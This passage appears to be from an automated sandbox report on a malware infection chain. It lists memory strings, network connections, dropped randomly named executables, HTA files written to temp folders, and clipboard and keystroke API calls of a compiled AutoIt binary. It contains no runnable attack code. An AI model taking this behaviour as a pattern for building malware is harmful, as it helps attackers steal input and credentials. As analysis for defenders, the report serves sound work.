                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                      Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsC:
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelCannot
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1991428513.000001F91ED89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
                      Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
                      Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.orghttps://monitor.firefox.comupgradeTabsProgressListenermaybeShowOnboarding
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                      Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://topsites.services.mozilla.com/cid/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F9212B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com_migrateXULStoreForDocumentshouldCheckDefaultBrowserPRIVILEGEDABOUT_RE
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/https://www.amazon.com/exec/obidos/external-searc
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://e0809c94-e14e-4649-a902-2a450fccc
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                      Source: 19be97887a.exe, 0000001E.00000003.1726455907.00000000058C9000.00000004.00000800.00020000.00000000.sdmp, 19be97887a.exe, 00000023.00000003.1871649664.00000000057C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000003.1958008473.000001F922A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchadditional_backgrounds_alignmentinternal:privateBrowsingAllowed
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
                      Source: 19be97887a.exe, 0000001E.00000003.1788130684.000000000589A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                      Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1962523007.0000006F3483C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
                      Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000034.00000002.1985782385.000001F91E443000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000034.00000002.1984524427.000001F91E2B0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: 19be97887a.exe, 0000001E.00000003.1787469607.00000000059B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000034.00000002.1962523007.0000006F3483C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000034.00000002.1988159515.000001F91E5B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000034.00000002.1997756718.000001F91FC6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2033119114.000001F922760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.widevine.com/setupInstallLocations/locations
Source: firefox.exe, 00000034.00000002.2028770010.000001F921278000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000034.00000002.2033119114.000001F922709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000034.00000002.2023597144.000001F9201E0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000034.00000002.1983640551.000001F91497A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/acc
Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1978497681.000001F912A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1985782385.000001F91E4AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000031.00000002.1900578768.000001BE4B36A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000032.00000002.1948982402.000001E00814F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd.
Source: firefox.exe, 00000034.00000002.1983640551.000001F91497A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.1983640551.000001F9149A9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdTrue
Source: firefox.exe, 00000034.00000002.1978786158.000001F912AE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwda
Source: firefox.exe, 00000034.00000002.1980859392.000001F912D03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdb
Source: firefox.exe, 00000034.00000002.1993367719.000001F91EE7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://89c8
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49695 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49698 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49762 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49763 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.8:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.8:49775 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49779 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49789 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49791 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.8:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49793 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.8:49796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0097EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0097ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_0096AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exe | Code function: 34_2_00999576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                      System Summary

Source: c6e8248d4e.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: c6e8248d4e.exe, 00000022.00000002.2110937860.00000000009C2000.00000002.00000001.01000000.00000014.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Windows\System32\cmd.exe | File created: C:\Temp\mtzRdqIHD.hta
Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exe | File created: C:\Users\user\AppData\Local\Temp\fJeYDlA9n.hta
Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: (non-printable)
Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: .idata
Source: 483d2fa8a0d53818306efeb32d3.exe.12.dr | Static PE information: section name: (non-printable)
Source: rapes.exe.17.dr | Static PE information: section name: (non-printable)
Source: rapes.exe.17.dr | Static PE information: section name: .idata
Source: rapes.exe.17.dr | Static PE information: section name: (non-printable)
Source: random[1].exe.28.dr | Static PE information: section name: (non-printable)
Source: random[1].exe.28.dr | Static PE information: section name: .idata
Source: 19be97887a.exe.28.dr | Static PE information: section name: (non-printable)
Source: 19be97887a.exe.28.dr | Static PE information: section name: .idata
Source: random[1].exe0.28.dr | Static PE information: section name: (non-printable)
Source: random[1].exe0.28.dr | Static PE information: section name: .idata
Source: random[1].exe0.28.dr | Static PE information: section name: (non-printable)
Source: bb5ad48269.exe.28.dr | Static PE information: section name: (non-printable)
Source: bb5ad48269.exe.28.dr | Static PE information: section name: .idata
Source: bb5ad48269.exe.28.dr | Static PE information: section name: (non-printable)
Source: random[1].exe2.28.dr | Static PE information: section name: (non-printable)
Source: random[1].exe2.28.dr | Static PE information: section name: .idata
Source: ab5415a7b5.exe.28.dr | Static PE information: section name: (non-printable)
Source: ab5415a7b5.exe.28.dr | Static PE information: section name: .idata
Source: random[2].exe0.28.dr | Static PE information: section name: (non-printable)
Source: random[2].exe0.28.dr | Static PE information: section name: .idata
Source: 60eb3ded99.exe.28.dr | Static PE information: section name: (non-printable)
Source: 60eb3ded99.exe.28.dr | Static PE information: section name: .idata
Source: D51OAO8D0TVNMCQXHC.exe.30.dr | Static PE information: section name: (non-printable)
